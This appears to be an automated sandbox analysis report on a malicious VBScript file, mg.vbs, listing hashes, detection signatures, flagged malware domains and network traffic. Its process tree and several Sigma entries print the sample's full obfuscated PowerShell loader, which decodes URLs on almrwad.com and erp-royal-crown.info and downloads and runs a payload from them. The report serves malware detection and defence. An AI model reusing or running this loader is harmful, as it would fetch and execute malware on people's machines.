Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mg.vbs

Overview

General Information

Sample name:mg.vbs
Analysis ID:1569002
MD5:8df76af54c38d5d4c2cd9f6d18eedf92
SHA1:b21c95ebf34440ad8da30f6e4fe25badb871d61a
SHA256:2fd9440e21adf91473719e9fb085f4d47a1d5afcf02333a7f04d2a0f4d0b1c77
Tags:Listofrequireditemsvbsuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6864 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4856 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7016JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7016.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", ProcessId: 6864, ProcessName: wscript.exe
      Sigma detected: Suspicious Scan Loop Network
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", ProcessId: 6864, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-05T10:41:52.827105+010028033053Unknown Traffic192.168.2.449731184.171.244.231443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
      Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiXAvira URL Cloud: Label: phishing
      Source: https://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
      Source: http://erp-royal-crown.infoAvira URL Cloud: Label: phishing
      Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
      Source: https://www.almrwad.com/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted file
      Source: mg.vbsReversingLabs: Detection: 34%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
      Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: Binary string: ystem.pdbM source: powershell.exe, 00000001.00000002.3005157693.00000273D325E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3005157693.00000273D31D4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.3005157693.00000273D31D4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.3005157693.00000273D31F4000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.com
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
      Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
      Source: Joe Sandbox ViewIP Address: 184.171.244.231 184.171.244.231
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 184.171.244.231:443
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.com
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
